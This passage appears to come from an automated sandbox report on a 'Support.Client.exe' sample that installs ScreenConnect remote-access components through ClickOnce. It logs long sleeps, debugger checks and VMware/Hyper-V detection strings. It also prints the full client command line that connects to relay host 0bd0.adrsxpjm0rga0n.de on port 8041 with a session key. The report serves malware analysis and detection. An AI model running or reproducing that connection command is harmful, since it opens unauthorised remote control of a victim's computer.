                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -599185s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -599017s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -598849s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -598625s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -598265s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -597991s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -597872s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -597763s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -597655s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -597544s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -597422s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -597297s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -597187s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -597078s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -596969s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -596844s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -596734s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -596624s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -596503s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -596375s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -596265s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -596156s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -596046s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -595936s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -595824s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -595679s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -595552s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -595375s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -595249s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -595125s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -595015s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -594905s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -594794s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -594687s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -594562s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -594452s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -594328s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -594218s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -594108s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -593984s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -593874s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -593760s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -593655s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -593531s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644 Thread sleep time: -593421s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -593312s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -593202s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -593092s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 7832 Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe TID: 1908 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe TID: 4588 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                  Source: C:\Users\user\Desktop\Support.Client.exe Last function: Thread delayed
                  Source: C:\Users\user\Desktop\Support.Client.exe Thread delayed: delay time: 40000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\2.0\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\
                  Source: Amcache.hve.4.dr Binary or memory string: VMware
                  Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin
                  Source: Amcache.hve.4.dr Binary or memory string: VMware, Inc.
                  Source: dfsvc.exe, 00000001.00000002.2539249322.000002515A6FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW|
                  Source: Amcache.hve.4.dr Binary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.4.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.4.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.4.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.2539249322.000002515A6FF000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2524797376.000002514022D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2938658022.000001DEBA413000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2938677429.000001DEBA42F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2939790536.000001DEBFA5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: Amcache.hve.4.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.4.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.4.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.4.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.2938304911.000000000124C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.4.dr Binary or memory string: vmci.sys
                  Source: Amcache.hve.4.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin`
                  Source: Amcache.hve.4.dr Binary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.4.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.4.dr Binary or memory string: VMware20,1
                  Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.4.dr Binary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.4.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.4.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.4.dr Binary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.4.dr Binary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.4.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.4.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\Support.Client.exe Process queried: DebugPort
                  Source: C:\Users\user\Desktop\Support.Client.exe Code function: 0_2_00C04573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C04573
                  Source: C:\Users\user\Desktop\Support.Client.exe Code function: 0_2_00C01000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00C01000
                  Source: C:\Users\user\Desktop\Support.Client.exe Code function: 0_2_00C03677 mov eax, dword ptr fs:[00000030h] 0_2_00C03677
                  Source: C:\Users\user\Desktop\Support.Client.exe Code function: 0_2_00C06893 GetProcessHeap,0_2_00C06893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\Support.Client.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: C:\Users\user\Desktop\Support.Client.exe Code function: 0_2_00C01493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C01493
                  Source: C:\Users\user\Desktop\Support.Client.exe Code function: 0_2_00C0191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C0191F
                  Source: C:\Users\user\Desktop\Support.Client.exe Code function: 0_2_00C01AAC SetUnhandledExceptionFilter,0_2_00C01AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: ScreenConnect.ClientService.dll.1.dr, ClientService.cs Reference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7568 -ip 7568
                  Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 884
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\467jxdcm.kdt\otwe8ppy.t3g\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\screenconnect.clientservice.exe" "?e=support&y=guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=bgiaaackaabsu0exaagaaaeaaqbdrypv%2fs%2bijgk1u%2flkqpsg%2bdg7f%2f4ax8qnsh9yo6i7a6uzday2kzfgamhsjf%2fkrmkc4kx%2fdk9zticrirrmqh3eoku1a3oxq2phk099m%2brhxm%2fsy2pwccl%2fy3eisydds8dysd7nyawc%2bzqbdk%2bcmbonghdqg5tz2dzsqbh4e9ppcohbmemq0olpi7s6np%2fbxp4rknbdymsyfm0a6kinc%2bdchq29f%2bxhgl%2fk%2fqmgvhtdipx8%2bo%2fttzqdolpxw57j20w3ypoh%2bhf7phxvddrwotzrarqotcrewuatoysrlumg3copsfhex5fryf45w%2bmrd4dxmwp56lw1jk7ocglwlfhe&r=&i=untitled%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\467jxdcm.kdt\otwe8ppy.t3g\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\screenconnect.clientservice.exe" "?e=support&y=guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=bgiaaackaabsu0exaagaaaeaaqbdrypv%2fs%2bijgk1u%2flkqpsg%2bdg7f%2f4ax8qnsh9yo6i7a6uzday2kzfgamhsjf%2fkrmkc4kx%2fdk9zticrirrmqh3eoku1a3oxq2phk099m%2brhxm%2fsy2pwccl%2fy3eisydds8dysd7nyawc%2bzqbdk%2bcmbonghdqg5tz2dzsqbh4e9ppcohbmemq0olpi7s6np%2fbxp4rknbdymsyfm0a6kinc%2bdchq29f%2bxhgl%2fk%2fqmgvhtdipx8%2bo%2fttzqdolpxw57j20w3ypoh%2bhf7phxvddrwotzrarqotcrewuatoysrlumg3copsfhex5fryf45w%2bmrd4dxmwp56lw1jk7ocglwlfhe&r=&i=untitled%20session" "1"
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2124711251.0000000000A32000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr Binary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2124711251.0000000000A32000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\Support.Client.exe Code function: 0_2_00C01BD4 cpuid 0_2_00C01BD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
